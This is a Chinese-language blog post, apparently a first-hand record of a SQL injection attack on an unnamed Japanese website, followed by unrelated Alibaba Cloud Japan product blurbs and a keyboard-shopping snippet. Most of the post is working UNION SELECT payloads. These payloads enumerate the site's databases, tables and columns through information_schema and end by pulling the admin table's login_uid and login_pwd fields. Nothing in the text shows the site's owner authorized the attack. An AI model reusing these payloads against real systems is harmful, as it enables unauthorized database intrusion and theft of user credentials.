實戰記錄,日本某站
注入點 and 語句測試
and1=1 返回正常,and=2跳回首頁,可能過濾了
用 』 測試返回錯誤頁面
判斷為注入點
order by語句查詢字段數
測試欄位數為9
報錯聯合查詢語句,查詢顯示位
2、3為顯示位
使用注入函式可爆出資料庫版本資訊
注入函式@@version_compile_os爆出作業系統
用注入函式database()爆出當前庫
mysql 5以上有內建庫information_schema,儲存著mysql的所有資料庫和表結構資訊
庫1爆出第二個資料庫,limit1,1即可
發現第二個資料庫就是當前庫
庫2and 1=2 union select 1,table_name,3,4,5,6,7,8,9from information_schema.tables wheretable_schema=(庫2名字16進製制)limit 0,1
爆第乙個表名,資料庫名要轉換為16進製制
表1 敏感表
改為limit 1,1可爆第二個表名
表2and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=0x68656e65636961 limit 0,1
使用group_concat(table_name)可以一次爆出全部表名
已得到敏感表名tm_admin_member,接下來爆欄位
表名要轉換為16進製制
and 1=2 union select
1,column_name,3,4,5,6,7,8,9 from
information_schema.columnswhere table_name= limit 0,1
推薦使用這種方法
and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name= limit 0,1
#column 翻譯為 列
用 group_concat(column_name)函式可以一次爆出全部字段
或者可以修改limit 1,1、limit 2,1.......來乙個乙個爆出
敏感字段
有敏感表名,敏感欄位名後就獲取內容
經測試login_uid欄位存放的是使用者名稱
login_pwd存放的是密碼
and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名
接下來的自行腦補.......
歡迎各位大神指點批評!
晨風原文:
API閘道器上線日本站
產品介紹 api 閘道器 api gateway 提供高效能 高可用的 api 託管服務,幫助使用者對外開放其部署在 ecs 容器服務等阿里雲產品上的應用,提供完整的 api 發布 管理 維護生命週期管理。使用者只需進行簡單的操作,即可快速 低成本 低風險地開放資料或服務。適用客戶 開發者,企業應用...
阿里雲專有宿主機日本站(公測)發布
產品介紹 阿里雲專有宿主機是一台物理獨享的雲主機,和其他租戶在物理級別上隔離。專有宿主機提供給使用者一種依託阿里雲虛擬化服務的單租戶執行環境,徹底解決多租戶爭搶問題,獲得更高隔離性,滿足更嚴格合規監管,滿足自帶許可證上雲場景。專有宿主機提供物理機維度的資源部署能力,提高ecs伺服器集群的部署靈活性。...
日本選購鍵盤
今天去日本秋葉原電器 閒逛。發現這裡的電器還是挺便宜的。於是萌生了想買乙個機械鍵盤的衝動。但是挑來挑去。也就是羅技 微軟 雷蛇 黑寡婦 filco這幾個牌子。主要還是羅技的天下,整整一排都是羅技的鍵盤滑鼠耳機什麼的。但是也沒看見什麼人選。羅技沒有了以前的風光。儘管他還是賣力的製作新品。但是少人問津。...